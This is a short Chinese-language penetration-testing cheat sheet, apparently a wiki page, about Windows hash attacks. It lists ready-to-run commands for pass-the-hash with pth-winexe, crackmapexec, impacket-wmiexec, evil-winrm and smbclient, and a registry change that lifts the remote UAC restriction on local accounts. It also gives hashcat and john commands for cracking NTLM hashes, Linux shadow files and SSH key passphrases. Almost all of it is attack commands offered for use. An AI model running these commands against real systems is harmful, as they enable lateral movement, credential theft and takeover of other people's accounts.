Hash攻击

从SAM数据库中或者LSASS内存中获取hash：mimikatz

pass the hash攻击原理及利用方法：PTH、Impacket

其他利用方式举例：

pth-winexe -U <user>%<LM>:<NTLM> //<IP> cmd
exploit/windows/smb/psexe
crackmapexec smb -u administrator -H <NTLM> --local-auth <IP>
crackmapexec smb -u administrator -H <NTLM> -d . <IP>
crackmapexec smb -u administrator -H <NTLM> -x 'whoami' <IP>
impacket-wmiexec administrator@<IP> -hashes <LM>:<NTLM>
evil-winrm -i <IP> -u user -H <NTLM>
smbclient //<IP>/c$ -U <user> --pw-nt-hash <NTLM> -W <domain>  # smb服务

远程UAC报错rpc_s_access_denied

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

NTLMhash破解：

hashcat -m 1000 <hash.txt> <pass.txt> --force
john --wordlist=<pass.txt> <hash.txt> --format=NT

Linux密码破解：

unshadow passwd.txt shadows.txt > unshadowed.txt    #整合两个文件
john --wordlist=<pass.txt> unshadowed.txt

破解ssh私钥保护密码

ssh2john id_rsa > ssh.hash
john ssh.hash --wordlist=<pass.txt>
hashcat -m 22921 ssh.hash <pass.txt> -r ssh.rule --force

最后更新于1年前

这有帮助吗？